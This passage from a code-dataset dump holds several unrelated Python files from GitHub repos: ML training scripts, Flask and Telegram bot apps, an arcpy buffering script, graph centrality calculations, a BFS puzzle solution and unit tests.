sl_vlay\n","repo_name":"lnls-sirius/hla","sub_path":"pyqt-apps/siriushla/li_di_bpms/bpm_main.py","file_name":"bpm_main.py","file_ext":"py","file_size_in_byte":15421,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"38487399664","text":"import sys\nsys.path.append('..')\nimport torch\nimport pytorch_lightning as pl\nfrom datetime import datetime\n\nfrom dataset.ba_dataset import GISAXSDataModule\nfrom models.pipeline import Pipeline\n\n\nmode = '1d2d' # both in-plane projections and 2D images\npath = '/bigdata/hplsim/aipp/Maksim/BA_simulation/complete/'\nbatch_size = 32\ntrain_frac = 0.8 # fraction of points to train on, remaining - to validate on\nn_layers = 12 # number of layers in material\n\n#! change n_dp tp 650000 when training the final model\nn_dp = 10000 # number of datapoints in the training dataset\n\nin_shape = (1024,512) # shape of images in raw data\nout_shape = (128,16) # shape of preprocessed images\nto_preload = False # preload data in RAM before training\n\n# augmentation variables\nto_augment = 0\nsigma = None\ndrop_y = None\nsp_prob = None\ndrop_prob = None\n\ntrain_file = f'/bigdata/hplsim/aipp/Maksim/BA_simulation/exp_data/data_{n_layers}_{n_dp}.pt'\ntest_file = f'/bigdata/hplsim/aipp/Maksim/BA_simulation/exp_data/data_{n_layers}_test.pt'\npreloaded_files = {'train': train_file, 'test_file': test_file}\n\nindices = range(0, n_dp)\ndata_module = GISAXSDataModule(mode, batch_size, preloaded_files=preloaded_files, path=path, \n indices=indices, to_preload=to_preload, to_augment=to_augment,\n in_shape=in_shape, out_shape=out_shape,\n sigma=sigma, drop_y=drop_y, sp_prob=sp_prob, \n mask=True, verbose=True, order=False)\n\nconfig = dict(\n context_dim=96,\n flow_hidden=64,\n hidden_dim_dec=4,\n hidden_dim_enc=16,\n latent_dim=4)\n\ncvae_params = dict(\n latent_dim=config['latent_dim'],\n context_dim=config['context_dim'], \n hidden_dim_enc=config['hidden_dim_enc'],\n hidden_dim_dec=config['hidden_dim_dec'],\n n_samples=1,\n drop_prob=0.1,\n)\n\npipe = Pipeline(n_layers=12, n_transforms=8, hidden_dim=config['flow_hidden'], \n cvae_params=cvae_params, lr=1e-3, step_lr=10)\n\nprogress_bar = pl.callbacks.TQDMProgressBar(refresh_rate=1000)\n\ntrainer = pl.Trainer(logger=None, max_epochs=30, \n callbacks=progress_bar, devices=\"auto\", accelerator=\"auto\", \n enable_progress_bar=True, enable_checkpointing=False, \n gradient_clip_val=1.5, accumulate_grad_batches=1)\n\ntrainer.fit(model=pipe, datamodule=data_module)\n\ndateTimeObj = datetime.now()\ntimestring = f'{dateTimeObj.date().month}{dateTimeObj.date().day}{dateTimeObj.time().hour}{dateTimeObj.time().minute}'\ntorch.save(pipe.state_dict(), f'../saved_models/pipe_{n_dp}_{timestring}.pt')","repo_name":"maxxxzdn/gisaxs-reconstruction","sub_path":"scripts/train_pipe.py","file_name":"train_pipe.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"1585398558","text":"# 토마토\nimport sys\nfrom collections import deque\ninput=sys.stdin.readline\n\ndx=[-1,1,0,0]\ndy=[0,0,-1,1]\n\ndef bfs():\n while len(q):\n x,y=q.popleft()\n\n for i in range(4):\n nx=x+dx[i]\n ny=y+dy[i]\n\n if nx<0 or ny<0 or nx>=n or ny>=m:\n continue\n if g[nx][ny]==-1:\n continue\n if g[nx][ny]==0:\n g[nx][ny]=g[x][y]+1\n q.append((nx,ny))\n\nm,n=map(int,input().split())\ng=[]\nfor i in range(n):\n g.append(list(map(int,input().split())))\nq=deque()\n\nfor i in range(n):\n for j in range(m):\n if g[i][j]==1:\n q.append((i,j))\nbfs()\n\nfor i in range(n):\n if 0 in g[i]:\n print(-1)\n exit()\n\nprint(max(map(max,g))-1)","repo_name":"Mindlestick/CodingTest","sub_path":"5.DFS&BFS/BOJ7576.py","file_name":"BOJ7576.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5645781404","text":"import requests,json\n\nfrom flask import Flask, jsonify, request, render_template\n\napp = Flask(\"Average temperature calculator\")\n\n@app.route(\"/temperature/<cityname>\")\ndef get_avg_temp(cityname):\n input_city = requests.get(\"https://geocode.xyz/\" + cityname + \"?json=1\")\n city_details = json.loads(input_city.text)\n city_location_details = city_details[\"alt\"][\"loc\"]\n for i in range(len(city_location_details)):\n city_specification = city_location_details[i]\n if cityname == city_specification[\"city\"]:\n latitude = str(city_specification[\"latt\"])\n longitude = str(city_specification[\"longt\"])\n input_city_coordinates = requests.get(\"https://api.open-meteo.com/v1/forecast?latitude=\" + latitude + \"&longitude=\" + longitude + \"&hourly=temperature_2m\")\n weather_details = json.loads(input_city_coordinates.text)\n list_of_temp = weather_details[\"hourly\"][\"temperature_2m\"]\n avg_temp = sum(list_of_temp) / len(list_of_temp)\n return jsonify(avg_temp)\n return \"Inappropriate city name.\"\n\n\n@app.route(\"/usage\")\ndef render_html():\n render_template(\"temperature.html\", city =\"Budapest\", country = \"Hungary\", averagetemp = get_avg_temp(\"Budapest\") )\n\n\n\n\n# https://geocode.xyz/Hauptstr.,+57632+Berzhausen?json=1\n\n# https://api.open-meteo.com/v1/forecast?latitude=52.52&longitude=13.41&hourly=temperature_2m\n\n# latitude:\"47.47\"\n# longitude:\"19.04\"\n# input_city_coordinates = requests.get(\"https://api.open-meteo.com/v1/forecast?latitude=\"+ \"47.47\"+ \"&longitude=\" +\"19.04\" + \"&hourly=temperature_2m\")\n# weather_details = json.loads(input_city_coordinates.text)\n# # print(weather_details)\n# list_of_temp = weather_details[\"hourly\"][\"temperature_2m\"]\n# print(list_of_temp)\n# avg_temp = sum(list_of_temp)/len(list_of_temp)\n# print(avg_temp)","repo_name":"talathkhaleel1/learning","sub_path":"automation/exam/temperature.py","file_name":"temperature.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6911157460","text":"__author__ = 'sleonard'\n#Write a script that creates a 15,000-meter buffer around features in the airports.shp feature class classified as an\n# airport ( based on the FEATURE field ) and a 7,500-meter buffer around features classified as a seaplane base\n\nimport arcpy\nfrom arcpy import env\nenv.workspace = \"F:/GIS/A_Masters_Program/Python/Data/Exercise07\"\n# define working file\nfecl = \"airports.shp\"\n# define variables for selecting out Airports and seaplane bases\nvar1 = \"\\\"FEATURE\\\" = 'Airport'\"\nvar2 = \"\\\"FEATURE\\\" = 'Seaplane Base'\"\n# the next two steps select out the variables and create new shapefiles.\narcpy.Select_analysis(fecl, \"Results/airport_15000M.shp\", var1)\narcpy.Select_analysis(fecl, \"Results/airport_7500M.shp\", var2 )\n# final steps take the just created files and builds buffers and outputs two new shapefiles.\narcpy.Buffer_analysis(\"Results/airport_15000M.shp\", \"Results/airports_buffer_15000M.shp\", \"15000 METERS\")\narcpy.Buffer_analysis(\"Results/airport_7500M.shp\", \"Results/airports_buffer_7500M.shp\", \"7500 METERS\")\n","repo_name":"Sleonard6179/Lab_4.1","sub_path":"Chpt_7_challenge1.py","file_name":"Chpt_7_challenge1.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21006768289","text":"from flask import Flask, render_template, request, redirect, url_for\nimport os, numpy\nfrom werkzeug.utils import secure_filename\nfrom prediction import predict\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = './static/uploads'\napp.config['ALLOWED_EXTENSIONS'] = {'png', 'jpg', 'jpeg', 'gif'}\n\ndef allowed_file(filename):\n return '.' in filename and filename.rsplit('.', 1)[-1].lower() in app.config['ALLOWED_EXTENSIONS']\n\n@app.route('/')\ndef index():\n return render_template('upload.html')\n\n@app.route('/upload', methods=['POST'])\ndef upload():\n if 'image' not in request.files:\n return redirect(request.url)\n\n file = request.files['image']\n\n if file.filename == '':\n return redirect(request.url)\n\n if file and allowed_file(file.filename):\n # Save the uploaded image on the server\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n predict(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n\n # Redirect to the display page with the image path\n return redirect(url_for('display', filename=filename))\n\n return \"Invalid file type. Allowed types: png, jpg, jpeg, gif\"\n\n@app.route('/display/<filename>')\ndef display(filename):\n # Get the image path and pass it to the display template\n image_path = os.path.join('static/results',filename) \n return render_template('display.html', image_path=image_path)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"RGIIST/raga","sub_path":"api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37825073177","text":"from typing import List\n\nfrom ted_sws.core.model.manifestation import ValidationSummaryReport\nfrom ted_sws.core.model.notice import Notice\nfrom ted_sws.core.model.validation_report import ReportNotice\nfrom ted_sws.data_manager.adapters.notice_repository import NoticeRepository\nfrom ted_sws.notice_validator.adapters.validation_summary_runner import ValidationSummaryRunner\n\n\ndef generate_validation_summary_report_notices(notices: List[ReportNotice],\n with_html: bool = False,\n template_metadata: dict = None) -> ValidationSummaryReport:\n validation_summary_runner = ValidationSummaryRunner()\n report = validation_summary_runner.validation_summary_for_notices(notices)\n if with_html:\n report.object_data = ValidationSummaryRunner.html_report(report, metadata=template_metadata)\n return report\n\n\ndef validation_summary_report_notice(notice: Notice, with_html: bool = False):\n validation_summary_runner = ValidationSummaryRunner()\n report = validation_summary_runner.validation_summary_for_notice(notice)\n if with_html:\n report.object_data = ValidationSummaryRunner.html_report(report)\n notice.validation_summary = report\n\n\ndef validation_summary_report_notice_by_id(notice_id: str, notice_repository: NoticeRepository,\n with_html: bool = False):\n notice = notice_repository.get(reference=notice_id)\n if notice is None:\n raise ValueError(f'Notice, with {notice_id} id, was not found')\n\n validation_summary_report_notice(notice=notice, with_html=with_html)\n notice_repository.update(notice=notice)\n","repo_name":"OP-TED/ted-rdf-conversion-pipeline","sub_path":"ted_sws/notice_validator/services/validation_summary_runner.py","file_name":"validation_summary_runner.py","file_ext":"py","file_size_in_byte":1687,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"13759458992","text":"from graph_tool.all import *\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport math\nimport time\nimport sys\nimport pickle\n\nclass Dataset(object):\n def __init__(self, X, rep):\n self.X = X\n self.rep = rep\n\nwith open(\"centr/centr_\"+sys.argv[1], \"wb\") as f:\n\tt0 = time.time()\n\tg = load_graph(\"datasets/\" + str(sys.argv[1]) + \".graphml\")\n\tt1 = time.time()\n\tprint(\"graph loaded successfully in \" + str(t1-t0) + \" seconds\")\n\n\tt0 = time.time()\n\tpr = pagerank(g)\n\tt1 = time.time()\n\tprint(\"pagerank calculated in \" + str(t1-t0) + \" seconds\")\n\tpr = [p for p in pr.a]\n\n\tt0 = time.time()\n\tbv, be = betweenness(g)\n\tt1 = time.time()\n\tprint(\"betweenness calculated in \" + str(t1-t0) + \" seconds\")\n\tbv = [b for b in bv.a]\n\n\t\"\"\"t0 = time.time()\n\tcl = closeness(g)\n\tt1 = time.time()\n\tprint(\"closeness calculated in \" + str(t1-t0) + \" seconds\")\n\tcl = [c for c in cl.a]\"\"\"\n\n\tt0 = time.time()\n\tev = eigenvector(g)[1]\n\tt1 = time.time()\n\tprint(\"eigenvector centrality calculated in \" + str(t1-t0) + \" seconds\")\n\tev = [e for e in ev.a]\n\n\tt0 = time.time()\n\tkz = katz(g)\n\tt1 = time.time()\n\tprint(\"katz calculated in \" + str(t1-t0) + \" seconds\")\n\tkz = [k for k in kz.a]\n\n\tt0 = time.time()\n\tht = hits(g)\n\tt1 = time.time()\n\tprint(\"hits calculated in \" + str(t1-t0) + \" seconds\")\n\tauth = [h for h in ht[1].a]\n\thub = [h for h in ht[2].a]\n\n\tt0 = time.time()\n\tid = [v.in_degree() for v in g.vertices()]\n\tt1 = time.time()\n\tprint(\"in degree calculated in \" + str(t1-t0) + \" seconds\")\n\n\tt0 = time.time()\n\tod = [v.out_degree() for v in g.vertices()]\n\tt1 = time.time()\n\tprint(\"out degree calculated in \" + str(t1-t0) + \" seconds\")\n\n\trep = [rep for rep in g.vertex_properties[\"Reputation\"]]\n\trep = (rep - np.amin(rep))/(np.amax(rep) - np.amin(rep))\n\tX = [[1 for b in bv], pr, bv, ev, kz, auth, hub, id, od]\n\tdata = Dataset(X,rep)\n\tpickle.dump(data,f,0)\n","repo_name":"lukasjf/graphmining-project","sub_path":"centrality.py","file_name":"centrality.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15318946210","text":"import asyncio\nimport logging\n\nfrom aiogram import Bot, Dispatcher, types\nfrom aiogram import F\nfrom aiogram.filters.command import Command\nfrom aiogram.utils.keyboard import InlineKeyboardBuilder\nfrom config_reader import config\n\n\nlogging.basicConfig(level=logging.INFO)\n\nbot = Bot(token=config.bot_token.get_secret_value())\ndp = Dispatcher()\n\n\n@dp.message(Command('start'))\nasync def cmd_start(message: types.Message):\n user = message.from_user\n kb = [\n [\n types.KeyboardButton(text='🛒Товары'),\n types.KeyboardButton(text='👤Профиль'),\n types.KeyboardButton(text='🤝О нас')\n ]\n ]\n keyboard = (types.ReplyKeyboardMarkup(\n keyboard=kb,\n resize_keyboard=True\n ))\n await message.answer(\n f'<b>Добро пожаловать, {user.first_name}!</b>\\n'\n 'В магазине вы можете найти...\\n\\n\\n'\n '<i>❗️Бот написан в качестве примера❗️</i>',\n reply_markup=keyboard,\n parse_mode='HTML'\n )\n\n\n@dp.message(F.text.lower() == '🛒товары')\nasync def product(message: types.Message):\n await message.reply('Доделать')\n\n@dp.message(F.text.lower() == '👤профиль')\nasync def account(message: types.Message):\n await message.reply(\n 'Здесь будет информация о пользователе\\n\\n'\n f'<i>Имя: </i>\\n'\n '...\\n'\n '...\\n',\n parse_mode='HTML'\n )\n\n@dp.message(F.text.lower() == '🤝о нас')\nasync def about(message: types.Message):\n await message.reply(\n '<b>Раздел о нас❗️</b>\\n\\n'\n '<i>здесь может быть ваша информация</i>\\n'\n '...\\n'\n '...',\n parse_mode='HTML'\n )\n\n\nadmin_users = [5946765150, 'admin_username']\n@dp.message(Command('admin_panel'))\nasync def admin(message: types.Message):\n user = message.from_user\n if message.from_user.id in admin_users:\n kb = [\n [ \n types.KeyboardButton(text='🛒Товары'),\n types.KeyboardButton(text='Добавить товар'),\n types.KeyboardButton(text='Рассылка'),\n types.KeyboardButton(text='Добавить промокод')\n ]\n ]\n keyboard = (types.ReplyKeyboardMarkup(\n keyboard=kb,\n resize_keyboard=True\n ))\n await message.reply(f'Привет, <b>{user.first_name}!</b>',reply_markup=keyboard, parse_mode='HTML')\n else:\n await message.reply('У вас нет доступа к этой команде.')\n\n\n@dp.message(F.text.lower() == 'добавить товар')\nasync def add_product(message: types.Message):\n if message.from_user.id in admin_users:\n await message.answer('Введите название товара:')\n else:\n await message.answer('У вас нет доступа к этой команде.')\n\n\n\n\n\n\n@dp.message(F.text.lower() == 'рассылка')\nasync def mailing(message: types.Message):\n if message.from_user.id in admin_users:\n await message.answer('Напишите текст рассылки:')\n else:\n await message.answer('У вас нет доступа к этой команде.')\n\n\n@dp.message(F.text.lower() == 'добавить промокод')\nasync def promo(message: types.Message):\n if message.from_user.id in admin_users:\n await message.answer('Введите уникальный промокод:')\n else:\n await message.answer('У вас нет доступа к этой команде.')\n\n\n\n\nasync def main():\n await dp.start_polling(bot)\n\n\nif __name__=='__main__':\n asyncio.run(main())\n","repo_name":"lilrory/TGShopBot_example","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"13000779460","text":"import time\nfrom flask import Flask, render_template, request\nimport sqlite3\nimport os\nfrom flask_socketio import SocketIO, emit, send, join_room, leave_room\nfrom multiprocessing import Value\n\nconn = sqlite3.connect('database', check_same_thread=False)\nc = conn.cursor()\n# create a table called rooms if it doesn't exist with room_id and epoch_time\nc.execute('''CREATE TABLE IF NOT EXISTS rooms (room_id text, timestamp integer)''')\nconn.commit()\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = os.urandom(24)\nsocketio = SocketIO(app)\n\ncounter = Value('i', 0)\n\n\n@app.route('/')\ndef homepage(): # put application's code here\n return render_template('index.html')\n\n\n@app.route('/create')\ndef create():\n with counter.get_lock():\n counter.value += 1\n new_room_id = counter.value\n #update database with new room id and datestamp\n c.execute('''INSERT INTO rooms VALUES (?, ?)''', (new_room_id, time.time()))\n print(new_room_id)\n return render_template('createRoom.html', room_id=new_room_id)\n\n\n@app.route('/room')\ndef room():\n room_id = request.args.get('room_id')\n # check if the room exists in the database\n c.execute('''SELECT * FROM rooms WHERE room_id=?''', (room_id,))\n if c.fetchone() is None:\n return render_template('joinRoom.html', invalid=True)\n\n return render_template('enterRoom.html', room_id=room_id)\n\n\n@app.route('/join')\ndef join():\n return render_template('joinRoom.html', invalid=False)\n\n\nif __name__ == '__main__':\n socketio.run(app)\n","repo_name":"blucardin/BlakcjackOnline","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"21949360300","text":"'''\nsbclearn (c) University of Manchester 2017\n\nsbclearn is licensed under the MIT License.\n\nTo view a copy of this license, visit <http://opensource.org/licenses/MIT/>.\n\n@author: neilswainston\n'''\n# pylint: disable=no-member\nimport unittest\n\nfrom sklearn import datasets, metrics, model_selection\nfrom sklearn.datasets.samples_generator import make_blobs\n\nimport numpy as np\nfrom sbclearn.theanets.utils import Classifier, Regressor\n\n\nclass TestClassifier(unittest.TestCase):\n '''Tests the Classifier class.'''\n\n def test_classify(self):\n '''Tests the classify method.'''\n x_data, y_data = make_blobs(n_samples=1000, centers=5, n_features=3,\n cluster_std=1.0, random_state=0)\n\n y_data = y_data.astype(np.int32)\n\n x_train, x_test, y_train, y_test = \\\n model_selection.train_test_split(x_data, y_data, test_size=0.2)\n\n classifier = Classifier(x_train, y_train)\n classifier.train()\n y_pred = classifier.predict(x_test)\n\n self.assertTrue(metrics.accuracy_score(y_test, y_pred) > 0.9)\n\n\nclass TestRegressor(unittest.TestCase):\n '''Tests the Regressor class.'''\n\n def test_predict(self):\n '''Tests the predict method.'''\n dataset = datasets.load_diabetes()\n\n x_train, x_test, y_train, y_test = \\\n model_selection.train_test_split(dataset.data, dataset.target,\n test_size=0.2)\n\n regressor = Regressor(x_train, y_train)\n regressor.train()\n y_pred = regressor.predict(x_test)\n\n self.assertTrue(metrics.r2_score(y_test, y_pred) > 0.3)\n","repo_name":"neilswainston/development-py","sub_path":"synbiochemdev/sbclearn/theanets/test/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29097096551","text":"#!/usr/bin/env python3\n\nfrom __future__ import (absolute_import, division, print_function)\n\n__metaclass__ = type\n\nimport os\nimport jinja2\nimport sys\nimport yaml\n\n\nclass Render:\n\n def __init__(self, template=None, variables=None, templates_dir=os.environ.get('TEMPLATES_DIR')):\n self.template = template\n self.variables = variables\n self.env = jinja2.Environment(\n loader=jinja2.FileSystemLoader(templates_dir),\n extensions=['jinja2.ext.autoescape', 'jinja2.ext.do', 'jinja2.ext.loopcontrols', 'jinja2.ext.with_'],\n autoescape=True,\n trim_blocks=True)\n\n def yaml_filter(self, value):\n return yaml.dump(value, Dumper=yaml.RoundTripDumper, indent=4)\n\n def env_override(self, value, key):\n return os.getenv(key, value)\n\n def rend_template(self, vars_dir=os.environ.get('VARS_DIR')):\n with open(vars_dir + \"/\" + self.variables, closefd=True) as f:\n data = yaml.safe_load(f)\n\n self.env.filters['yaml'] = self.yaml_filter\n self.env.globals[\"environ\"] = lambda key: os.environ.get(key)\n self.env.globals[\"get_context\"] = lambda: data\n\n try:\n template = self.env.get_template(self.template).render(data)\n except Exception as e:\n raise e\n sys.stdout.write(template)\n\n return template\n\n def get_jinja2env(self):\n return self.env","repo_name":"robertmarinescu/estuary-testrunner","sub_path":"entities/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33929364195","text":"n = int(input())\nlongest_inter = set()\n\nfor _ in range(n):\n first, second = input().split(\"-\")\n start_first, end_first = first.split(\",\")\n start_second, end_second = second.split(\",\")\n first_iter = set(range(int(start_first), int(end_first) + 1))\n second_iter = set(range(int(start_second), int(end_second) + 1))\n if len(first_iter.intersection(second_iter)) > len(longest_inter):\n longest_inter = first_iter.intersection(second_iter)\n\nprint(f\"Longest intersection is {list(sorted(longest_inter))} with length {len(longest_inter)}\")\n","repo_name":"KalinHar/Advanced-Python-SoftUni","sub_path":"tuples and sets/longest intersection.py","file_name":"longest intersection.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"36871941620","text":"import nltk\r\nfrom nltk.tokenize import word_tokenize\r\nSENT_DETECTOR = nltk.data.load('tokenizers/punkt/english.pickle')\r\nfrom nltk.stem import WordNetLemmatizer\r\nlemmatizer = WordNetLemmatizer()\r\nimport json\r\nimport pickle\r\nfrom matplotlib import pyplot\r\n\r\nimport numpy as np\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Activation, Dropout\r\nfrom keras.optimizers import SGD\r\nimport random\r\n\r\ndef train():\r\n elements=[]\r\n classes = []\r\n eleTagPair = []\r\n ignore_charecters = ['?', '!']\r\n data_file = open('tri_train.json').read()\r\n intents = json.loads(data_file)\r\n\r\n\r\n for intent in intents['intents']:\r\n for Ques in intent['patterns']:\r\n\r\n #tokenize each word\r\n w = nltk.word_tokenize(Ques)\r\n elements.extend(w)\r\n #add documents in the corpus\r\n eleTagPair.append((w, intent['tag']))\r\n\r\n # add to our classes list\r\n if intent['tag'] not in classes:\r\n classes.append(intent['tag'])\r\n\r\n# lemmaztize and lower each word and remove duplicates\r\n elements = [lemmatizer.lemmatize(w.lower()) for w in elements if w not in ignore_charecters]\r\n elements = sorted(list(set(elements)))\r\n# sort classes\r\n classes = sorted(list(set(classes)))\r\n# documents = combination between patterns and intents\r\n #print (len(eleTagPair), \"eleTagPair\")\r\n # classes = intents\r\n #print (len(classes), \"classes\", classes)\r\n# words = all words, vocabulary\r\n #print (len(elements), \"unique lemmatized elements\", elements)\r\n\r\n\r\n pickle.dump(elements,open('words.pkl','wb'))\r\n pickle.dump(classes,open('classes.pkl','wb'))\r\n\r\n# create our training data\r\n trainData = []\r\n# create an empty array for our output\r\n output_empty = [0] * len(classes)\r\n# training set, bag of words for each sentence\r\n for doc in eleTagPair:\r\n # initialize our bag of words\r\n bag = []\r\n # list of tokenized words for the pattern\r\n pattern_words = doc[0]\r\n # lemmatize each word - create base word, in attempt to represent related words\r\n pattern_words = [lemmatizer.lemmatize(word.lower()) for word in pattern_words]\r\n # create our bag of words array with 1, if word match found in current pattern\r\n for w in elements:\r\n bag.append(1) if w in pattern_words else bag.append(0)\r\n \r\n # output is a '0' for each tag and '1' for current tag (for each pattern)\r\n output_row = list(output_empty)\r\n output_row[classes.index(doc[1])] = 1\r\n \r\n trainData.append([bag, output_row])\r\n#print(training)\r\n# shuffle our features and turn into np.array\r\n random.shuffle(trainData)\r\n trainData = np.array(trainData)\r\n# create train and test lists. X - patterns, Y - intents\r\n train_x = list(trainData[:,0])\r\n#print(train_x)\r\n train_y = list(trainData[:,1])\r\n print(\"Training data created\")\r\n return train_x, train_y,elements\r\n\r\ndef test(train_word_len):\r\n elements=[]\r\n classes = []\r\n eleTagPair = []\r\n ignore_charecters = ['?', '!']\r\n data_file = open('tri_test.json').read()\r\n intents = json.loads(data_file)\r\n\r\n\r\n for intent in intents['intents']:\r\n for Ques in intent['patterns']:\r\n\r\n #tokenize each word\r\n w = nltk.word_tokenize(Ques)\r\n elements.extend(w)\r\n #add documents in the corpus\r\n eleTagPair.append((w, intent['tag']))\r\n\r\n # add to our classes list\r\n if intent['tag'] not in classes:\r\n classes.append(intent['tag'])\r\n\r\n# lemmaztize and lower each word and remove duplicates\r\n elements = [lemmatizer.lemmatize(w.lower()) for w in elements if w not in ignore_charecters]\r\n elements = sorted(list(set(elements)))\r\n diff = train_word_len - len(elements)\r\n #print(diff)\r\n pad(elements,'x',train_word_len)\r\n #print(len(words))\r\n# sort classes\r\n classes = sorted(list(set(classes)))\r\n# eleTagPair = combination between patterns and intents\r\n #print (len(documents), \"documents\")\r\n # classes = intents\r\n #print (len(classes), \"classes\", classes)\r\n# elements = all words, vocabulary\r\n #print (len(elements), \"unique lemmatized words\", elements)\r\n\r\n\r\n pickle.dump(elements,open('words.pkl','wb'))\r\n pickle.dump(classes,open('classes.pkl','wb'))\r\n\r\n# create our training data\r\n testData = []\r\n# create an empty array for our output\r\n output_empty = [0] * len(classes)\r\n# training set, bag of words for each sentence\r\n for doc in eleTagPair:\r\n # initialize our bag of words\r\n bag = []\r\n # list of tokenized words for the pattern\r\n pattern_words = doc[0]\r\n # lemmatize each word - create base word, in attempt to represent related words\r\n pattern_words = [lemmatizer.lemmatize(word.lower()) for word in pattern_words]\r\n # create our bag of words array with 1, if word match found in current pattern\r\n for w in elements:\r\n bag.append(1) if w in pattern_words else bag.append(0)\r\n \r\n # output is a '0' for each tag and '1' for current tag (for each pattern)\r\n output_row = list(output_empty)\r\n output_row[classes.index(doc[1])] = 1\r\n \r\n testData.append([bag, output_row])\r\n#print(training)\r\n# shuffle our features and turn into np.array\r\n random.shuffle(testData)\r\n testData = np.array(testData)\r\n# create train and test lists. X - patterns, Y - intents\r\n test_x = list(testData[:,0])\r\n#print(train_x)\r\n test_y = list(testData[:,1])\r\n print(\"Testing data created\")\r\n return test_x, test_y\r\n\r\ndef pad(l, content, width):\r\n l.extend([content] * (width - len(l)))\r\n\r\n\r\ntrain_x, train_y,train_words = train()\r\ntest_x,test_y = test(len(train_words))\r\n \r\n \r\nmodel = Sequential()\r\nmodel.add(Dense(128, input_shape=(len(train_x[0]),), activation='relu'))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(64, activation='relu'))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(len(train_y[0]), activation='softmax'))\r\n\r\n# Compile model. Stochastic gradient descent with Nesterov accelerated gradient gives good results for this model\r\nsgd = SGD(lr=0.01, decay=1e-6, momentum=0.9, nesterov=True)\r\nmodel.compile(loss='categorical_crossentropy', optimizer=sgd, metrics=['accuracy'])\r\n\r\n#fitting and saving the model \r\nhistory = model.fit(np.array(train_x), np.array(train_y),validation_data=(np.array(test_x), np.array(test_y)), epochs=200, batch_size=5, verbose=0)\r\n# evaluate the model\r\n_, train_acc = model.evaluate(np.array(train_x), np.array(train_y), verbose=0)\r\n_, test_acc = model.evaluate(np.array(test_x), np.array(test_y), verbose=0)\r\nprint('Train: %.3f, Test: %.3f' % (train_acc, test_acc))\r\n\r\n# plot loss during training\r\npyplot.subplot(211)\r\npyplot.title('Loss')\r\npyplot.plot(history.history['loss'], label='train')\r\npyplot.plot(history.history['val_loss'], label='test')\r\npyplot.legend()\r\n# plot accuracy during training\r\npyplot.subplot(212)\r\npyplot.title('Accuracy')\r\npyplot.plot(history.history['accuracy'], label='train')\r\npyplot.plot(history.history['val_accuracy'], label='test')\r\npyplot.legend()\r\npyplot.show()\r\n\r\n","repo_name":"Manjulakh/Chatbot","sub_path":"test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":7067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16249756085","text":"import torch\nfrom torch.utils.data import Dataset\nimport numpy as np\n\n\nclass PairsFullSize(Dataset):\n \"\"\"\n Train: For each sample creates randomly a positive or a negative pair\n Test: Creates fixed pairs for testing\n \"\"\"\n\n def __init__(self, data, labels, idx=None):\n if idx is not None:\n self.data = [data[i] for i in idx]\n self.labels = np.array([labels[i] for i in idx])\n else:\n self.data = data\n self.labels = np.array(labels)\n\n self.seed = 42\n\n self.labels_set = list(self.labels)\n self.label_to_indices = {label: np.where(self.labels == label)[0]\n for label in self.labels_set}\n\n def __getitem__(self, index):\n if torch.cuda.is_available():\n device = 'cuda:0'\n else:\n device = 'cpu'\n\n self.seed += 1\n\n item1, label1 = self.data[index], self.labels[index]\n\n if torch.cuda.is_available():\n item1 = item1.cuda()\n\n # selecting genuine pair\n np.random.seed(self.seed)\n\n pair_index = index\n while pair_index == index:\n pair_index = np.random.choice(self.label_to_indices[label1])\n\n item2 = self.data[pair_index]\n\n if torch.cuda.is_available():\n item2 = item2.cuda()\n\n # selecting impostor pair\n\n pair_label = np.random.choice([item for item in self.labels_set if item not in list([label1])])\n pair_index = np.random.choice(self.label_to_indices[pair_label])\n\n item3 = self.data[pair_index]\n\n if torch.cuda.is_available():\n item3 = item3.cuda()\n\n return (item1.float(), item2.float(), item3.float()), (torch.tensor(0, device=device).float(),\n torch.tensor(1, device=device).float())\n\n def __len__(self):\n return 